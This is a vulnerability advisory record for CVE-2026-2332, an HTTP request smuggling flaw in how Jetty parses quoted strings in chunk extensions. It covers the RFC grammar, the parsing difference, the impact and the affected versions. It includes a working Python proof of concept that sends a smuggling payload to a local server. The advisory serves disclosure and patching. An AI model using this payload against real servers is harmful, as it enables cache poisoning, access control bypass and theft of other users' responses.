{"id":"GHSA-355h-qmc2-wpwf","summary":"Jetty has HTTP Request Smuggling via Chunked Extension Quoted-String Parsing","details":"### Description (as reported)\n\nJetty incorrectly parses quoted strings in HTTP/1.1 chunked transfer encoding extension values, enabling request smuggling attacks.\n\n### Background\n\nThis vulnerability is a new variant discovered while researching the \"Funky Chunks\" HTTP request smuggling techniques:\n- https://w4ke.info/2025/06/18/funky-chunks.html\n- https://w4ke.info/2025/10/29/funky-chunks-2.html\n\nThe original research tested various chunk extension parsing differentials but did not test quoted-string handling within extension values.\n\n### Technical Details\n\n**RFC 9112 Section 7.1.1** defines chunked transfer encoding:\n```\nchunk = chunk-size [ chunk-ext ] CRLF chunk-data CRLF\nchunk-ext = *( BWS \";\" BWS chunk-ext-name [ BWS \"=\" BWS chunk-ext-val ] )\nchunk-ext-val = token / quoted-string\n```\n\n**RFC 9110 Section 5.6.4** defines quoted-string:\n```\nquoted-string = DQUOTE *( qdtext / quoted-pair ) DQUOTE\n```\n\nA quoted-string continues until the closing DQUOTE, and `\\r\\n` sequences are not permitted within the quotes.\n\n### Vulnerability\n\nJetty terminates chunk header parsing at `\\r\\n` inside quoted strings instead of treating this as an error.\n\n**Expected (RFC compliant):**\n```\nChunk: 1;a=\"value\\r\\nhere\"\\r\\n\n         ^^^^^^^^^^^^^^^^^^ extension value\nBody: [1 byte after the real \\r\\n]\n```\n\n**Actual (jetty):**\n```\nChunk: 1;a=\"value\n            ^^^^^ terminates here (WRONG)\nBody: here\"... treated as body/next request\n```\n\n### Proof of Concept\n\n```python\n#!/usr/bin/env python3\nimport socket\n\npayload = (\n    b\"POST / HTTP/1.1\\r\\n\"\n    b\"Host: localhost\\r\\n\"\n    b\"Transfer-Encoding: chunked\\r\\n\"\n    b\"\\r\\n\"\n    b'1;a=\"\\r\\n'\n    b\"X\\r\\n\"\n    b\"0\\r\\n\"\n    b\"\\r\\n\"\n    b\"GET /smuggled HTTP/1.1\\r\\n\"\n    b\"Host: localhost\\r\\n\"\n    b\"Content-Length: 11\\r\\n\"\n    b\"\\r\\n\"\n    b'\"\\r\\n'\n    b\"Y\\r\\n\"\n    b\"0\\r\\n\"\n    b\"\\r\\n\"\n)\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.settimeout(3)\nsock.connect((\"127.0.0.1\", 8080))\nsock.sendall(payload)\n\nresponse = b\"\"\nwhile True:\n    try:\n        chunk = sock.recv(4096)\n        if not chunk:\n            break\n        response += chunk\n    except socket.timeout:\n        break\n\nsock.close()\nprint(f\"Responses: {response.count(b'HTTP/')}\")\nprint(response.decode(errors=\"replace\"))\n```\n\n**Result:** Server returns 2 HTTP responses from a single TCP connection.\n\n#### Parsing Breakdown\n\n| Parser | Request 1 | Request 2 |\n|--------|-----------|-----------|\n| jetty (vulnerable) | POST / body=\"X\" | GET /smuggled (SMUGGLED!) |\n| RFC compliant | POST / body=\"Y\" | (none - smuggled request hidden in extension) |\n\n### Impact\n\n- **Request Smuggling**: Attacker injects arbitrary HTTP requests\n- **Cache Poisoning**: Smuggled responses poison shared caches\n- **Access Control Bypass**: Smuggled requests bypass frontend security\n- **Session Hijacking**: Smuggled requests can steal other users' responses\n\n### Reproduction\n\n1. Start the minimal POC with docker\n2. Run the poc script provided in same zip\n\n### Suggested Fix\n\nEnsure the chunk framing and extensions are parsed exactly as specified in RFC9112. \nA CRLF inside a quoted-string should be considered a parsing error and not a line terminator.\n\n\n### Patches\nNo patches yet.\n\n### Workarounds\nNo workarounds yet.\n\n### References\n\n- RFC 9110: HTTP Semantics (Sections 5.6.4, 7.1.1)\n- Funky Chunks Research: https://w4ke.info/2025/06/18/funky-chunks.html\n- details for security versions https://jetty.org/security.html","aliases":["CVE-2026-2332"],"modified":"2026-05-20T00:45:27.457940177Z","published":"2026-04-14T23:40:31Z","related":["CGA-5h9p-26x9-27gj"],"database_specific":{"github_reviewed":true,"github_reviewed_at":"2026-04-14T23:40:31Z","nvd_published_at":"2026-04-14T12:16:21Z","cwe_ids":["CWE-444"],"severity":"HIGH"},"references":[{"type":"WEB","url":"https://github.com/jetty/jetty.project/security/advisories/GHSA-355h-qmc2-wpwf"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-2332"},{"type":"PACKAGE","url":"https://github.com/jetty/jetty.project"},{"type":"WEB","url":"https://gitlab.eclipse.org/security/cve-assignment/-/issues/89"},{"type":"WEB","url":"https://w4ke.info/2025/06/18/funky-chunks.html"}],"affected":[{"package":{"name":"org.eclipse.jetty:jetty-http","ecosystem":"Maven","purl":"pkg:maven/org.eclipse.jetty/jetty-http"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"12.1.0"},{"fixed":"12.1.7"}]}],"versions":["12.1.0","12.1.1","12.1.2","12.1.3","12.1.4","12.1.5","12.1.6"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-355h-qmc2-wpwf/GHSA-355h-qmc2-wpwf.json","last_known_affected_version_range":"\u003c= 12.1.6"}},{"package":{"name":"org.eclipse.jetty:jetty-http","ecosystem":"Maven","purl":"pkg:maven/org.eclipse.jetty/jetty-http"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"12.0.0"},{"fixed":"12.0.33"}]}],"versions":["12.0.0","12.0.1","12.0.10","12.0.11","12.0.12","12.0.13","12.0.14","12.0.15","12.0.16","12.0.17","12.0.18","12.0.19","12.0.2","12.0.20","12.0.21","12.0.22","12.0.23","12.0.24","12.0.25","12.0.26","12.0.27","12.0.28","12.0.29","12.0.3","12.0.30","12.0.31","12.0.32","12.0.4","12.0.5","12.0.6","12.0.7","12.0.8","12.0.9"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-355h-qmc2-wpwf/GHSA-355h-qmc2-wpwf.json","last_known_affected_version_range":"\u003c= 12.0.32"}},{"package":{"name":"org.eclipse.jetty:jetty-http","ecosystem":"Maven","purl":"pkg:maven/org.eclipse.jetty/jetty-http"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"11.0.0"},{"last_affected":"11.0.27"}]}],"versions":["11.0.0","11.0.1","11.0.10","11.0.11","11.0.12","11.0.13","11.0.14","11.0.15","11.0.16","11.0.17","11.0.18","11.0.19","11.0.2","11.0.20","11.0.21","11.0.22","11.0.23","11.0.24","11.0.25","11.0.26","11.0.3","11.0.4","11.0.5","11.0.6","11.0.7","11.0.8","11.0.9"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-355h-qmc2-wpwf/GHSA-355h-qmc2-wpwf.json"}},{"package":{"name":"org.eclipse.jetty:jetty-http","ecosystem":"Maven","purl":"pkg:maven/org.eclipse.jetty/jetty-http"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"10.0.0"},{"last_affected":"10.0.27"}]}],"versions":["10.0.0","10.0.1","10.0.10","10.0.11","10.0.12","10.0.13","10.0.14","10.0.15","10.0.16","10.0.17","10.0.18","10.0.19","10.0.2","10.0.20","10.0.21","10.0.22","10.0.23","10.0.24","10.0.25","10.0.26","10.0.3","10.0.4","10.0.5","10.0.6","10.0.7","10.0.8","10.0.9"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-355h-qmc2-wpwf/GHSA-355h-qmc2-wpwf.json"}},{"package":{"name":"org.eclipse.jetty:jetty-http","ecosystem":"Maven","purl":"pkg:maven/org.eclipse.jetty/jetty-http"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"9.4.0"},{"last_affected":"9.4.59"}]}],"versions":["9.4.0.v20161208","9.4.0.v20180619","9.4.1.v20170120","9.4.1.v20180619","9.4.10.RC0","9.4.10.RC1","9.4.10.v20180503","9.4.11.v20180605","9.4.12.RC0","9.4.12.RC1","9.4.12.RC2","9.4.12.v20180830","9.4.13.v20181111","9.4.14.v20181114","9.4.15.v20190215","9.4.16.v20190411","9.4.17.v20190418","9.4.18.v20190429","9.4.19.v20190610","9.4.2.v20170220","9.4.2.v20180619","9.4.20.v20190813","9.4.21.v20190926","9.4.22.v20191022","9.4.23.v20191118","9.4.24.v20191120","9.4.25.v20191220","9.4.26.v20200117","9.4.27.v20200227","9.4.28.v20200408","9.4.29.v20200521","9.4.3.v20170317","9.4.3.v20180619","9.4.30.v20200611","9.4.31.v20200723","9.4.32.v20200930","9.4.33.v20201020","9.4.34.v20201102","9.4.35.v20201120","9.4.36.v20210114","9.4.37.v20210219","9.4.38.v20210224","9.4.39.v20210325","9.4.4.v20170414","9.4.4.v20180619","9.4.40.v20210413","9.4.41.v20210516","9.4.42.v20210604","9.4.43.v20210629","9.4.44.v20210927","9.4.45.v20220203","9.4.46.v20220331","9.4.47.v20220610","9.4.48.v20220622","9.4.49.v20220914","9.4.5.v20170502","9.4.5.v20180619","9.4.50.v20221201","9.4.51.v20230217","9.4.52.v20230823","9.4.53.v20231009","9.4.54.v20240208","9.4.55.v20240627","9.4.56.v20240826","9.4.57.v20241219","9.4.58.v20250814","9.4.6.v20170531","9.4.6.v20180619","9.4.7.RC0","9.4.7.v20170914","9.4.7.v20180619","9.4.8.v20171121","9.4.8.v20180619","9.4.9.v20180320"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-355h-qmc2-wpwf/GHSA-355h-qmc2-wpwf.json"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"}]}